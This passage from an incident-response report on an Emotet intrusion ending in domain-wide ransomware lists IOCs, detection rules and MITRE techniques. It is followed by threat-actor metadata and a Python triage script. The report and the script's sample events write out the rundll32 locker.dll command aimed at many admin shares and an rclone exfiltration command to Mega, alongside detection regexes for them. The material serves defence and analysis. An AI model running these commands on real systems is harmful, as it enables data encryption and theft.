The script invoked the\r\nmain ransomware payload, locker.dll, and passed a list of all the computers in the domain to the target parameter.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 31 of 38\n\nrundll32.exe locker.dll,run /TARGET=\\\\HOST1.DOMAIN.NAME\\C$ /TARGET=\\\\HOST2.DOMAIN.NAME\\C$ /TARGET=\\\\H\r\nThe executable began to encrypt all the targeted hosts in the environment and dropped a ransom note:\r\nREADME_TO_DECRYPT.html\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 32 of 38\n\nAfter the invocation of the ransomware payload, about a minute later, the threat actor launched Process Hacker.\r\nWe believe this was to monitor the execution of the ransomware payload.\r\nAll systems in the domain were encrypted and presented with a ransom message.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 33 of 38\n\nIndicators\r\nAtomic\r\nEmotet Deployment Domains\r\ndescontador[.]com[.]br\r\nwww.elaboro[.]pl\r\nel-energiaki[.]gr\r\ndrechslerstammtisch[.]de\r\ndhnconstrucciones[.]com[.]ar\r\ndilsrl[.]com\r\nEmotet C2 Servers\r\n103.159.224.46\r\n103.75.201.2\r\n119.193.124.41\r\n128.199.225.17\r\n131.100.24.231\r\n139.59.60.88\r\n144.217.88.125\r\n146.59.226.45\r\n149.56.131.28\r\n159.89.202.34\r\n165.22.211.113\r\n165.227.166.238\r\n178.128.82.218\r\n209.126.98.206\r\n213.32.75.32\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 34 of 38\n\n37.187.115.122\r\n45.226.53.34\r\n45.55.134.126\r\n46.55.222.11\r\n51.210.176.76\r\n51.254.140.238\r\n54.37.70.105\r\n82.223.82.69\r\n91.207.181.106\r\n92.114.18.20\r\n94.23.45.86\r\n96.125.171.165\r\nCobalt Strike\r\n139.60.161.167 (survefuz[.]com)\r\n139.60.160.18 (juanjik[.]com)\r\nTactical RMM 
Agent\r\napi.floppasoftware[.]com\r\nmesh.floppasoftware[.]com\r\n212.73.150.62\r\nComputed\r\nK-1 06.13.2022.lnk\r\nde7c4da78a6cbba096e32e5eecb00566\r\n02b4f495e9995cc2251c19cd9984763f52122951\r\n1bf9314ae67ab791932c43e6c64103b1b572a88035447dae781bffd21a1187ad\r\n17jun.exe\r\n0ea68856c4f56f4056502208e97e9033\r\nb80c987c8849bf7905ea8f283b79d98753e3c15a\r\n41e230134deca492704401ddf556ee2198ef6f32b868ec626d9aefbf268ab6b1\r\ndontsleep.exe\r\n50cc3a3bca96d7096c8118e838d9bc16\r\nb286b58ed32b6df4ecdb5df86d7d7d177bb7bfaf\r\nf8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee\r\nlocker.dll\r\nd2df4601c8d43e655163c0b292bc4cc9\r\nf6727d5d04f2728a3353fbd45d7b2cb19e98802c\r\n6424b4983f83f477a5da846a1dc3e2565b7a7d88ae3f084f3d3884c43aec5df6\r\nnetscan.exe\r\n27f7186499bc8d10e51d17d3d6697bc5\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 35 of 38\n\n52332ce16ee0c393b8eea6e71863ad41e3caeafd\r\n18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566\r\nrclone.exe\r\n22bbe1747933531e9c240e0db86268e2\r\nc2a8776e21403eb00b38bfccd36d1c03dffb009e\r\n53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc\r\nBehavioral\r\nThe threat actor delivered Emotet via a Emotet loader in the form of a LNK file responsible for dropp\r\nTactical RMM Agent was installed by the threat actor on a server to ensure remote access (17jun.exe)\r\nData was exfiltrated to Mega cloud service via Rclone (rclone.exe).\r\nNetwork mapping was performed using SoftPerfect Network Scanner (netscan.exe) followed by Quantum ran\r\nThe threat actor kept the remote desktop session alive by running a program to keep the session activ\r\nDetections\r\nNetwork\r\nThe DFIR Report Cobalt Strike 139.60.160.18\r\nThe DFIR Report Cobalt Strike 139.60.161.167\r\nET Threatview.io High Confidence Cobalt Strike C2 IP group 1\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC 
DCERPC SVCCTL - Remote Service Control Manager Access\r\nET INFO Observed External IP Lookup Domain (icanhazip .com in TLS SNI)t\r\nET JA3 HASH - Possible Rclone Client Response (Mega Storage)\r\nET POLICY HTTP POST to MEGA Userstorage\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET CNC Feodo Tracker Reported CnC Server group 1\r\nET CNC Feodo Tracker Reported CnC Server group 14\r\nET CNC Feodo Tracker Reported CnC Server group 15\r\nET CNC Feodo Tracker Reported CnC Server group 17\r\nET CNC Feodo Tracker Reported CnC Server group 19\r\nET CNC Feodo Tracker Reported CnC Server group 2\r\nET CNC Feodo Tracker Reported CnC Server group 20\r\nET CNC Feodo Tracker Reported CnC Server group 21\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 36 of 38\n\nET CNC Feodo Tracker Reported CnC Server group 23\r\nET CNC Feodo Tracker Reported CnC Server group 24\r\nET CNC Feodo Tracker Reported CnC Server group 25\r\nET CNC Feodo Tracker Reported CnC Server group 3\r\nET CNC Feodo Tracker Reported CnC Server group 4\r\nET CNC Feodo Tracker Reported CnC Server group 5\r\nET CNC Feodo Tracker Reported CnC Server group 6\r\nET CNC Feodo Tracker Reported CnC Server group 7\r\nET CNC Feodo Tracker Reported CnC Server group 8\r\nET CNC Feodo Tracker Reported CnC Server group 9\r\nET MALWARE W32/Emotet CnC Beacon 3\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/proc_creation_win_emotet_child_process_spawn_pattern.yml\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/15184/15184.yar\r\nMITRE\r\nPowerShell – T1059.001\r\nProcess 
Injection – T1055\r\nFile Deletion – T1070.004\r\nLateral Tool Transfer – T1570\r\nValid Accounts – T1078\r\nService Execution – T1569.002\r\nSMB/Windows Admin Shares – T1021.002\r\nRemote System Discovery – T1018\r\nProcess Discovery – T1057\r\nRundll32 – T1218.011\r\nRegsvr32 – T1218.010\r\nDomain Account – T1087.002\r\nDomain Groups – T1069.002\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 37 of 38\n\nSystem Information Discovery – T1082\r\nData Encrypted for Impact – T1486\r\nNetwork Share Discovery – T1135\r\nData from Network Shared Drive – T1039\r\nWeb Protocols – T1071.001\r\nRemote Access Software – T1219\r\nExfiltration to Cloud Storage – T1567.002\r\nRemote Desktop Protocol – T1021.001\r\nMalicious File – T1204.002\r\nSpearphishing Attachment – T1566.001\r\nExploitation of Remote Services – T1210\r\nInternal case #15184\r\nSource: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 38 of 38",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/"
	],
	"report_names": [
		"emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4b076dcb-516e-42fb-9c8f-f153902cd5e9",
			"created_at": "2022-10-25T16:07:23.708745Z",
			"updated_at": "2026-04-10T02:00:04.720108Z",
			"deleted_at": null,
			"main_name": "Hidden Lynx",
			"aliases": [
				"Aurora Panda",
				"Group 8",
				"Heart Typhoon",
				"Hidden Lynx",
				"Operation SMN"
			],
			"source_name": "ETDA:Hidden Lynx",
			"tools": [
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"BlackCoffee",
				"HiKit",
				"MCRAT.A",
				"Mdmbot.E",
				"Moudoor",
				"Naid",
				"PNGRAT",
				"Trojan.Naid",
				"ZoxPNG",
				"gresim"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a7aefdda-98f1-4790-a32d-14cc99de2d60",
			"created_at": "2023-01-06T13:46:38.281844Z",
			"updated_at": "2026-04-10T02:00:02.909711Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"BRONZE KEYSTONE",
				"G0025",
				"Group 72",
				"G0001",
				"HELIUM",
				"Heart Typhoon",
				"Group 8",
				"AURORA PANDA",
				"Hidden Lynx",
				"Tailgater Team"
			],
			"source_name": "MISPGALAXY:APT17",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28",
			"created_at": "2023-01-06T13:46:38.39927Z",
			"updated_at": "2026-04-10T02:00:02.958273Z",
			"deleted_at": null,
			"main_name": "ENERGETIC BEAR",
			"aliases": [
				"BERSERK BEAR",
				"ALLANITE",
				"Group 24",
				"Koala Team",
				"G0035",
				"ATK6",
				"ITG15",
				"DYMALLOY",
				"TG-4192",
				"Crouching Yeti",
				"Havex",
				"IRON LIBERTY",
				"Blue Kraken",
				"Ghost Blizzard"
			],
			"source_name": "MISPGALAXY:ENERGETIC BEAR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "06f622cb-3a78-49cf-9a4c-a6007a69325f",
			"created_at": "2022-10-25T16:07:23.315239Z",
			"updated_at": "2026-04-10T02:00:04.537826Z",
			"deleted_at": null,
			"main_name": "APT 3",
			"aliases": [
				"APT 3",
				"Boron",
				"Brocade Typhoon",
				"Bronze Mayfair",
				"Buckeye",
				"G0022",
				"Gothic Panda",
				"Group 6",
				"Operation Clandestine Fox",
				"Operation Clandestine Fox, Part Deux",
				"Operation Clandestine Wolf",
				"Operation Double Tap",
				"Red Sylvan",
				"TG-0110",
				"UPS Team"
			],
			"source_name": "ETDA:APT 3",
			"tools": [
				"APT3 Keylogger",
				"Agent.dhwf",
				"BKDR_HUPIGON",
				"Backdoor.APT.CookieCutter",
				"Badey",
				"Bemstour",
				"CookieCutter",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EXL",
				"EternalBlue",
				"HTran",
				"HUC Packet Transmit Tool",
				"Hupigon",
				"Hupigon RAT",
				"Kaba",
				"Korplug",
				"LaZagne",
				"MFC Huner",
				"OSInfo",
				"Pirpi",
				"PlugX",
				"RedDelta",
				"RemoteCMD",
				"SHOTPUT",
				"Sogu",
				"TIGERPLUG",
				"TTCalc",
				"TVT",
				"Thoper",
				"Xamtrav",
				"remotecmd",
				"shareip",
				"w32times"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434575,
	"ts_updated_at": 1775792289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.pdf",
		"text": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.txt",
		"img": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.jpg"
	}
}
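Added example, not code from The DFIR Report or from any tool named in the record above: a Python triage pass over process-creation command lines that picks out the three hands-on-keyboard artifacts quoted in the plain_text, namely MeshAgent's -b64exec payload (decoded the same way the report's base64 was decoded), rclone copying a UNC path to a named remote such as mega:1, and rundll32 loading locker.dll with a fan-out of /TARGET= admin shares. The event records, host names and rule names are constructed for illustration; the rclone flag completing "--multi-threa" and the third /TARGET host are assumptions, since the report's own command lines are truncated at those points.

```python
"""Triage helper for the process-creation artifacts quoted in the report:
MeshAgent -b64exec scripts, rclone copies to a cloud remote, and rundll32
launching a locker against many /TARGET= admin shares. Added example, not
DFIR Report code; events, hosts and rule names below are constructed."""
import base64
import re

# Constructed sample events modelled on the command lines quoted in the
# write-up. The rclone flag completing "--multi-threa" and the third /TARGET
# host are assumptions: the report's own lines are truncated at those points.
SAMPLE_EVENTS = [
    {"host": "SRV01", "image": "MeshAgent.exe",
     "cmdline": r'"MeshAgent.exe" -b64exec '
                r'cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5j'},
    {"host": "SRV01", "image": "rclone.exe",
     "cmdline": r'rclone.exe copy "\\SERVER.domain.name\path" mega:1 -q '
                r'--ignore-existing --auto-confirm --multi-thread-streams 4'},
    {"host": "SRV02", "image": "rundll32.exe",
     "cmdline": r'rundll32.exe locker.dll,run /TARGET=\\HOST1.DOMAIN.NAME\C$ '
                r'/TARGET=\\HOST2.DOMAIN.NAME\C$ /TARGET=\\HOST3.DOMAIN.NAME\C$'},
    {"host": "WS07", "image": "rundll32.exe",  # benign control: no fan-out
     "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL'},
]

B64EXEC_RE = re.compile(r'-b64exec\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
RCLONE_RE = re.compile(
    r'rclone(?:\.exe)?"?\s+(copy|copyto|sync|move)\s+"?([^"\s]+)"?\s+([A-Za-z0-9_-]+:\S*)',
    re.IGNORECASE)
RUNDLL32_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^\s",]+)', re.IGNORECASE)
TARGET_RE = re.compile(r'/TARGET=(\\\\[^\s\\]+\\\S+)', re.IGNORECASE)


def decode_b64exec(cmdline):
    """Decode the script MeshAgent is told to run via -b64exec, or None.

    Telemetry pipelines truncate long command lines, so the blob is re-padded
    (and a dangling sextet dropped) to recover the readable prefix anyway."""
    m = B64EXEC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1).rstrip("=")
    if len(blob) % 4 == 1:        # one leftover base64 char carries no full byte
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def rclone_transfer(cmdline):
    """Return {verb, source, remote} when rclone moves data to a named remote."""
    m = RCLONE_RE.search(cmdline)
    if not m:
        return None
    verb, source, remote = m.groups()
    return {"verb": verb.lower(), "source": source, "remote": remote}


def ransomware_fanout(cmdline, min_targets=2):
    """Return {dll, targets} when rundll32 is pointed at several hosts' admin
    shares through /TARGET= switches; None for ordinary rundll32 use."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return None
    targets = TARGET_RE.findall(cmdline)
    if len(targets) < min_targets:
        return None
    return {"dll": m.group(1), "targets": targets}


def triage(events):
    """Run all three checks over {host, image, cmdline} events; one finding per hit."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        script = decode_b64exec(cmd)
        if script is not None:
            findings.append({"host": ev["host"], "rule": "meshagent_b64exec",
                             "detail": {"script": script}})
        xfer = rclone_transfer(cmd)
        if xfer is not None:
            findings.append({"host": ev["host"], "rule": "rclone_to_remote",
                             "detail": xfer})
        fanout = ransomware_fanout(cmd)
        if fanout is not None:
            findings.append({"host": ev["host"], "rule": "rundll32_target_fanout",
                             "detail": fanout})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:24} {f['detail']}")
```

Run it directly to print the findings, or import it and call triage() on events exported from an EDR in the same {host, image, cmdline} shape. The padding logic in decode_b64exec is there because command-line fields are routinely cut off by telemetry pipelines, exactly as the report's own -b64exec capture is; a readable prefix such as require('win-console').hide() is still enough to pivot on. The rundll32 check deliberately keys on the fan-out of /TARGET= admin shares rather than on the file name locker.dll, since the name changes between deployments while the one-process-encrypts-many-hosts pattern does not.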